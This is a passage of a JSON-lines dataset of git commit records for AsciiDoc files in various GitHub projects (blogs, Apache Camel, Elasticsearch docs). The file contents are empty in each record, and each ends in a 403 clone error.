camel,isavin\/camel,onders86\/camel,dmvolod\/camel,lburgazzoli\/camel,driseley\/camel,ssharma\/camel,nicolaferraro\/camel,driseley\/camel,jarst\/camel,RohanHart\/camel,apache\/camel,davidkarlsen\/camel,dmvolod\/camel,yuruki\/camel,bgaudaen\/camel,snurmine\/camel,pkletsko\/camel,dmvolod\/camel,salikjan\/camel,pax95\/camel,mgyongyosi\/camel,davidkarlsen\/camel,anton-k11\/camel,objectiser\/camel,onders86\/camel,pmoerenhout\/camel,drsquidop\/camel,gilfernandes\/camel,jamesnetherton\/camel,neoramon\/camel,gautric\/camel,nboukhed\/camel,gautric\/camel,curso007\/camel,ullgren\/camel,NickCis\/camel,gnodet\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,ssharma\/camel,ssharma\/camel,davidkarlsen\/camel,mcollovati\/camel,jonmcewen\/camel,cunningt\/camel,jkorab\/camel,lburgazzoli\/apache-camel,DariusX\/camel,adessaigne\/camel,adessaigne\/camel,dmvolod\/camel,adessaigne\/camel,pmoerenhout\/camel,gnodet\/camel,cunningt\/camel,mcollovati\/camel,ullgren\/camel,nikhilvibhav\/camel,adessaigne\/camel,apache\/camel,CodeSmell\/camel,bhaveshdt\/camel,prashant2402\/camel,jarst\/camel,jkorab\/camel,bhaveshdt\/camel,snurmine\/camel,punkhorn\/camel-upstream,nboukhed\/camel,drsquidop\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,CodeSmell\/camel,dmvolod\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,pmoerenhout\/camel,sirlatrom\/camel,gautric\/camel,prashant2402\/camel,curso007\/camel,zregvart\/camel,rmarting\/camel,yuruki\/camel,pax95\/camel,sabre1041\/camel,alvinkwekel\/camel,scranton\/camel,anoordover\/camel,tdiesler\/camel,allancth\/camel,akhettar\/camel,tadayosi\/camel,scranton\/camel,gautric\/camel,isavin\/camel,tdiesler\/camel,ssharma\/camel,mgyongyosi\/camel,mcollovati\/camel,pax95\/camel,anton-k11\/camel,jonmcewen\/camel,salikjan\/camel,veithen\/camel,christophd\/camel,nboukhed\/camel,jonmcewen\/camel,anton-k11\/camel,drsquidop\/camel,tlehoux\/camel,driseley\/camel,anoordover\/camel,bhaveshdt\/camel,drsquidop\/camel,christophd\/camel,pkletsko\/camel,anoordover\/camel,sverkera\/camel,tlehoux\/camel,cunningt\/camel,w4tson\/camel,veithen\/camel,snurmine\/camel,christophd\/camel,pkletsko\/camel,christophd\/camel,lburgazzoli\/camel,anton-k11\/camel,w4tson\/camel,sirlatrom\/camel,jarst\/camel,hqstevenson\/camel,nicolaferraro\/camel,chirino\/camel,chirino\/camel,neoramon\/camel,nicolaferraro\/camel,tkopczynski\/camel,sirlatrom\/camel,jamesnetherton\/camel,tkopczynski\/camel,sirlatrom\/camel,Thopap\/camel,akhettar\/camel,w4tson\/camel,punkhorn\/camel-upstream,Thopap\/camel,sverkera\/camel,pkletsko\/camel,DariusX\/camel,rmarting\/camel,lburgazzoli\/apache-camel,zregvart\/camel,sabre1041\/camel,bhaveshdt\/camel,tadayosi\/camel,prashant2402\/camel,adessaigne\/camel,gilfernandes\/camel,cunningt\/camel,mgyongyosi\/camel,gnodet\/camel,kevinearls\/camel,tdiesler\/camel,mgyongyosi\/camel,scranton\/camel,anoordover\/camel,mcollovati\/camel,snurmine\/camel,alvinkwekel\/camel,chirino\/camel,jkorab\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,curso007\/camel,mgyongyosi\/camel,cunningt\/camel,hqstevenson\/camel,zregvart\/camel,allancth\/camel,sverkera\/camel,jamesnetherton\/camel,jkorab\/camel,nboukhed\/camel,anton-k11\/camel,RohanHart\/camel,akhettar\/camel,lburgazzoli\/camel,sabre1041\/camel,NickCis\/camel,chirino\/camel,yuruki\/camel,tadayosi\/camel,driseley\/camel,Fabryprog\/camel,Fabryprog\/camel,rmarting\/camel,akhettar\/camel,bgaudaen\/camel,zregvart\/camel,alvinkwekel\/camel,lburgazzoli\/apache-camel,gautric\/camel,allancth\/camel,rmarting\/camel,bgaudaen\/camel,tadayosi\/camel,lburgazzoli\/camel,gilfernandes\/camel,veithen\/camel,allancth\/camel,pax95\/camel,cunningt\/camel,acartapanis\/camel,RohanHart\/camel,sabre1041\/camel,veithen\/camel,pkletsko\/camel,prashant2402\/camel,tadayosi\/camel,scranton\/camel,yuruki\/camel,hqstevenson\/camel,driseley\/camel,sverkera\/camel,Thopap\/camel,onders86\/camel,isavin\/camel,tadayosi\/camel,ullgren\/camel,DariusX\/camel,akhettar\/camel,jarst\/camel,veithen\/camel,sverkera\/camel,bgaudaen\/camel,christophd\/camel,apache\/camel,RohanHart\/camel,anton-k11\/camel,snurmine\/camel,Thopap\/camel,anoordover\/camel,gilfernandes\/camel,hqstevenson\/camel,kevinearls\/camel,ssharma\/camel,Thopap\/camel,objectiser\/camel,bgaudaen\/camel,rmarting\/camel,curso007\/camel,jkorab\/camel,scranton\/camel,prashant2402\/camel,NickCis\/camel,bhaveshdt\/camel,objectiser\/camel,neoramon\/camel,jamesnetherton\/camel,lburgazzoli\/camel,ssharma\/camel,DariusX\/camel,Fabryprog\/camel,CodeSmell\/camel,sabre1041\/camel,allancth\/camel,jonmcewen\/camel,nboukhed\/camel,veithen\/camel,scranton\/camel,tlehoux\/camel,NickCis\/camel,ullgren\/camel,jarst\/camel,w4tson\/camel,snurmine\/camel","old_file":"camel-core\/src\/main\/docs\/xpath-language.adoc","new_file":"camel-core\/src\/main\/docs\/xpath-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cc4e60d1d83444fdbbf56daff0fe0d2a9b80b6a3","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a74792bbefab9b21b95d9800406e823183a92439","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"028df688a3716abb3eb6392cff52d91affebdb23","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/httpie-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/httpie-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"067207d4ecd4328414b25a31e53c6932c9fa668c","subject":"Fixed encoding issue","message":"Fixed encoding issue\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/lab.adoc","new_file":"lab\/lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b91c311043749f27ce93f144816a50a24f11ddb1","subject":"Publish 10th-November-2015-Evolve.adoc","message":"Publish 10th-November-2015-Evolve.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"10th-November-2015-Evolve.adoc","new_file":"10th-November-2015-Evolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4566cf07794924ad65dbe84a4dd503cb00abff4","subject":"Update 2015-09-03-Artifactory-Cleanup-Policy-That-Retains-the-Latest-N-Artifacts-for-Every-Module.adoc","message":"Update 2015-09-03-Artifactory-Cleanup-Policy-That-Retains-the-Latest-N-Artifacts-for-Every-Module.adoc","repos":"jkschneider\/jkschneider.github.io,jkschneider\/jkschneider.github.io,jkschneider\/jkschneider.github.io","old_file":"_posts\/2015-09-03-Artifactory-Cleanup-Policy-That-Retains-the-Latest-N-Artifacts-for-Every-Module.adoc","new_file":"_posts\/2015-09-03-Artifactory-Cleanup-Policy-That-Retains-the-Latest-N-Artifacts-for-Every-Module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jkschneider\/jkschneider.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbac6d70ef6751046b8a7ca04f3dd30f4e1144cd","subject":"y2b create post New iPad 5 Smart Covers Leaked? (First Look + Demo)","message":"y2b create post New iPad 5 Smart Covers Leaked? (First Look + Demo)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-26-New-iPad-5-Smart-Covers-Leaked-First-Look--Demo.adoc","new_file":"_posts\/2013-09-26-New-iPad-5-Smart-Covers-Leaked-First-Look--Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d4c39a913d12f296457e39ae9a04fcd6809782e","subject":"Update 2016-03-31-Functional-HTTP-server-with-Vertx-and-Javaslang.adoc","message":"Update 2016-03-31-Functional-HTTP-server-with-Vertx-and-Javaslang.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2016-03-31-Functional-HTTP-server-with-Vertx-and-Javaslang.adoc","new_file":"_posts\/2016-03-31-Functional-HTTP-server-with-Vertx-and-Javaslang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00de2a76c8e7a06e25e9a9c4e057e36333aa2495","subject":"y2b create post N-Control Avenger for PS3 Controller Unboxing \\u0026 First Look","message":"y2b create post N-Control Avenger for PS3 Controller Unboxing \\u0026 First Look","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-14-NControl-Avenger-for-PS3-Controller-Unboxing-u0026-First-Look.adoc","new_file":"_posts\/2012-05-14-NControl-Avenger-for-PS3-Controller-Unboxing-u0026-First-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7ff152955d36285f8a3d934cd0d641f7ea354cb","subject":"y2b create post OnePlus 5T Unboxing - Is This The One?","message":"y2b create post OnePlus 5T Unboxing - Is This The One?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-16-OnePlus-5T-Unboxing--Is-This-The-One.adoc","new_file":"_posts\/2017-11-16-OnePlus-5T-Unboxing--Is-This-The-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d65ae86d962fe51c00a5112dd12b8c0455954ec","subject":"Update 2017-11-21-Building-op-appear-with-using-Gradle.adoc","message":"Update 2017-11-21-Building-op-appear-with-using-Gradle.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-11-21-Building-op-appear-with-using-Gradle.adoc","new_file":"_posts\/2017-11-21-Building-op-appear-with-using-Gradle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c82f2c21ca69b362a78c6765d8b160be5033490a","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e33088880caec0418921e46bd33575f4575783e","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"502db32d3bf011004a6a612727ef9d38e9a05932","subject":"Update 2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","message":"Update 2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d5053a7c455aa71955dfd7d1cd18fbf3c6fa1da","subject":"Update 2016-11-15-231000-Tuesday.adoc","message":"Update 2016-11-15-231000-Tuesday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-15-231000-Tuesday.adoc","new_file":"_posts\/2016-11-15-231000-Tuesday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a5c4e5dedc80b1cf0af81b1b7e9b84f13538b1b","subject":"Update 2016-06-21-New-development-blog.adoc","message":"Update 2016-06-21-New-development-blog.adoc","repos":"eunas\/eunas.github.io,eunas\/eunas.github.io,eunas\/eunas.github.io,eunas\/eunas.github.io","old_file":"_posts\/2016-06-21-New-development-blog.adoc","new_file":"_posts\/2016-06-21-New-development-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eunas\/eunas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed245d45055d18802160c5e0b9c78c02a97bbe19","subject":"aadding readme","message":"aadding readme\n","repos":"arun-gupta\/docker-java-sample","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arun-gupta\/docker-java-sample.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa01fda9b099a1ee62acba7620e6d0d9b715d192","subject":"[doc] typo fix algo clique, fixes #66","message":"[doc] typo fix algo clique, fixes #66\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"268717f1b3bd557e288d1fb83ce56958a0dd09d7","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c35bd203430f147d5997a477b51063fed763d68","subject":"y2b create post HUGE TECH GIVEAWAY -- Galaxy S4, HTC One, iPad Mini \\u0026 Macbook Air!","message":"y2b create post HUGE TECH GIVEAWAY -- Galaxy S4, HTC One, iPad Mini \\u0026 Macbook Air!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-02-HUGE-TECH-GIVEAWAY--Galaxy-S4-HTC-One-iPad-Mini-u0026-Macbook-Air.adoc","new_file":"_posts\/2013-05-02-HUGE-TECH-GIVEAWAY--Galaxy-S4-HTC-One-iPad-Mini-u0026-Macbook-Air.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1150c7abba10fe77876b9bf60511cbef59e612c1","subject":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","message":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fef1567dd2c0c33ac63f6b55bdf8bbee3d479888","subject":"jira migration","message":"jira migration\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2019\/05\/16\/jira-migration.adoc","new_file":"content\/news\/2019\/05\/16\/jira-migration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"252c60a2e74e1febdcc805ab1321e2c328968dae","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09a2018737879001ce6f2b2bc88a0542b3de25cb","subject":"Remove recommanded setup","message":"Remove recommanded setup\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4664e8e80f9ffd913856fc41e1b6e4c233f1ba2e","subject":"Added the attribute user to the RFC.","message":"Added the attribute user to the RFC.\n","repos":"uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"669d334f6ac72541563c42b8710f4baff7b6b267","subject":"Copied some concept docs from the wiki to the repo","message":"Copied some concept docs from the wiki to the repo\n\nso that it can be found easier\n","repos":"chirino\/ipaas-rest,redhat-ipaas\/ipaas-rest,redhat-ipaas\/ipaas-rest,KurtStam\/syndesis-rest,chirino\/ipaas-rest,chirino\/ipaas-rest,rhuss\/ipaas-rest,KurtStam\/syndesis-rest,redhat-ipaas\/ipaas-api-java,rhuss\/ipaas-rest,redhat-ipaas\/ipaas-rest,KurtStam\/ipaas-rest,KurtStam\/ipaas-rest,KurtStam\/ipaas-rest,redhat-ipaas\/ipaas-api-java,rhuss\/ipaas-rest,KurtStam\/syndesis-rest","old_file":"docs\/design\/ui-domain-object-map.adoc","new_file":"docs\/design\/ui-domain-object-map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chirino\/ipaas-rest.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c3ab527ef167eaacbc951feb09bbd70044924d4","subject":"Update 2016-02-03-CONCEPTS.adoc","message":"Update 2016-02-03-CONCEPTS.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-CONCEPTS.adoc","new_file":"_posts\/2016-02-03-CONCEPTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b087cd7249ddedd5f7189ccbde6d00c184cd814f","subject":"Add Change Log","message":"Add Change Log\n","repos":"juxt\/tick,juxt\/tick","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/tick.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fedf42c23d4ef17639426f6a623003d0e0614a90","subject":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","message":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d96516e524a32b81fac5d6e703817e73b5861128","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc2743743c90a117a64bb0c10d1e16e6e1a7e864","subject":"Fix version constant in Groovy API docs","message":"Fix version constant in Groovy API docs\n\nThis commit fixes the version constant in the Groovy API docs from\n5.0.0-alpha5 to 6.0.0-alpha1.\n","repos":"ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,Helen-Zhao\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,jprante\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,nazarewk\/elasticsearch,wangtuo\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,nilabhsagar\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,rlugojr\/elasticsearch,obourgain\/elasticsearch,Shepard1212\/elasticsearch,LeoYao\/elasticsearch,LewayneNaidoo\/elasticsearch,rlugojr\/elasticsearch,uschindler\/elasticsearch,Helen-Zhao\/elasticsearch,gingerwizard\/elasticsearch,a2lin\/elasticsearch,artnowo\/elasticsearch,yanjunh\/elasticsearch,fred84\/elasticsearch,MisterAndersen\/elasticsearch,Helen-Zhao\/elasticsearch,umeshdangat\/elasticsearch,artnowo\/elasticsearch,nilabhsagar\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,IanvsPoplicola\/elasticsearch,fforbeck\/elasticsearch,JSCooke\/elasticsearch,obourgain\/elasticsearch,C-Bish\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,mortonsykes\/elasticsearch,spiegela\/elasticsearch,Stacey-Gammon\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mikemccand\/elasticsearch,rajanm\/elasticsearch,i-am-Nathan\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elasticassandra,fforbeck\/elasticsearch,yanjunh\/elasticsearch,JSCooke\/elasticsearch,lks21c\/elasticsearch,bawse\/elasticsearch,IanvsPoplicola\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,C-Bish\/elasticsearch,nazarewk\/elasticsearch,JervyShi\/elasticsearch,umeshdangat\/elasticsearch,geidies\/elasticsearch,umeshdangat\/elasticsearch,elasticdog\/elasticsearch,vroyer\/elasticassandra,spiegela\/elasticsearch,bawse\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,wenpos\/elasticsearch,fernandozhu\/elasticsearch,masaruh\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,wangtuo\/elasticsearch,jprante\/elasticsearch,ZTE-PaaS\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LewayneNaidoo\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,nezirus\/elasticsearch,fforbeck\/elasticsearch,maddin2016\/elasticsearch,henakamaMSFT\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,mikemccand\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/